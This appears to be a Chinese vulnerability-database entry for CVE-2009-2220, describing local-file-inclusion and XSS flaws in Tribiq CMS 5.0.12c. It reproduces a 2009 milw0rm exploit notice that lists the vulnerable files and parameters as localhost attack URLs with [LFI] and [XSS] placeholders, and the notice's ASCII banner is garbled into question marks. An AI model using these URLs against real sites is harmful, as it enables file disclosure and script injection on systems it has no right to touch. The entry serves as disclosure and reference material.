Tribiq CMS 多个目录遍历漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1118012 漏洞类型 路径遍历
发布时间 2009-06-24 更新时间 2009-06-26
CVE编号 CVE-2009-2220 CNNVD-ID CNNVD-200906-412
漏洞平台 PHP CVSS评分 5.1
|漏洞来源
https://www.exploit-db.com/exploits/9012
https://cxsecurity.com/issue/WLB-2009060186
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200906-412
|漏洞详情
TribiqCMS5.0.12c版本中存在多个目录遍历漏洞,当register_globals被激活且magic_quotes_gpc被中止时,远程攻击者可以借助对(1)masthead.inc.php,(2)toppanel.inc.php,(3)templates/mytribiqsite/tribiq-CL-9000/includes的contact.inc.php;以及对(4)templates/mytribiqsite/tribiq-CL-9000/includes/nlarlist_content.inc.php的use_template_family参数的template_path参数中的目录遍历序列,包含并可能运行任意文件。
|漏洞EXP
????????????????????????????????????????????????????????????????????????????????????
??                                C r a C k E r                                   ??
??             T H E   C R A C K   O F   E T E R N A L   M I G H T                ??
????????????????????????????????????????????????????????????????????????????????????

 ?????         From The Ashes and Dust Rises An Unimaginable crack....         ?????
????????????????????????????????????????????????????????????????????????????????????
??     [ Local File Include ]                                         [ XSS ]     ??
????????????????????????????????????????????????????????????????????????????????????
:   Author   : CraCkEr                   : :                                       :
?   Script   : Tribiq CMS 5.0.12c        ? ?          Register Globals :           ?
?   Download : sourceforge.net           ? ?                                       ?
?   Method   : GET                       ? ?           [ ] ON   [?] OFF            ?
?   Critical : High [????????]           ? ?                                       ?
?   Impact   : system information        ? ?                                       ?
? ???????????????????????????????????????? ??????????????????????????????????????? ?
?                                 DALnet #crackers                                ??
????????????????????????????????????????????????????????????????????????????????????
:                                                                                  :
?  Release Notes:                                                                  ?
?  ?????????????                                                                   ?
?  Typically used for remotely exploitable vulnerabilities that can lead to        ?
?  system compromise.                                                              ?
?                                                                                  ?

????????????????????????????????????????????????????????????????????????????????????
??                                Exploit URL's                                   ??
????????????????????????????????????????????????????????????????????????????????????


[LFI]

http://localhost/path/templates/mytribiqsite/tribiq-CL-9000/includes/masthead.inc.php?template_path=[LFI]
http://localhost/path/templates/mytribiqsite/tribiq-CL-9000/includes/nlarlist_content.inc.php?use_template_family=[LFI]
http://localhost/path/templates/mytribiqsite/tribiq-CL-9000/includes/toppanel.inc.php?template_path=[LFI]
http://localhost/path/templates/mytribiqsite/tribiq-CL-9000/includes/contact.inc.php?template_path=[LFI]
http://localhost/path/templates/mytribiqsite/tribal-GPL-1066/includes/header.inc.php?template_path=[LFI]


[XSS]

http://localhost/path/templates/mytribiqsite/tribiq-CL-9000/includes/nlarlist_content.inc.php?use_template_family=[XSS]
http://localhost/path/templates/mytribiqsite/tribiq-CL-9000/includes/contact.inc.php?errordisplay=[XSS]
http://localhost/path/templates/mytribiqsite/tribiq-CL-9000/includes/contact.inc.php?errormessage=[XSS]
http://localhost/path/templates/mytribiqsite/tribal-GPL-1066/includes/header.inc.php?template_path=[XSS]
http://localhost/path/templates/mytribiqsite/tribal-GPL-1066/includes/forum.inc.php?forum_summary[title]=[XSS]
http://localhost/path/templates/mytribiqsite/tribal-GPL-1066/includes/forum.inc.php?forum_summary[threadlastpost]=[XSS]
http://localhost/path/templates/mytribiqsite/tribal-GPL-1066/includes/forum.inc.php?forum_summary[replies]=[XSS]
http://localhost/path/templates/mytribiqsite/tribal-GPL-1066/includes/forum.inc.php?forum_summary[threads]=[XSS]
http://localhost/path/templates/mytribiqsite/tribal-GPL-1066/includes/forum.inc.php?forum_summary[description]=[XSS]
http://localhost/path/tb/common/tb_foot.inc.php?tbFootNonStandardFooter=[XSS]

   
????????????????????????????????????????????????????????????????????????????????????
 
Greets:
       rd0, The_PitBull, Raz0r, iNs, Sad, His0k4, Hussin X, Mr. SQL .

????????????????????????????????????????????????????????????????????????????????????
??                                 © CraCkEr 2009                                 ??
????????????????????????????????????????????????????????????????????????????????????

# milw0rm.com [2009-06-24]
|参考资料

来源:BID
名称:35484
链接:http://www.securityfocus.com/bid/35484
来源:MILW0RM
名称:9012
链接:http://www.milw0rm.com/exploits/9012
来源:SECUNIA
名称:35535
链接:http://secunia.com/advisories/35535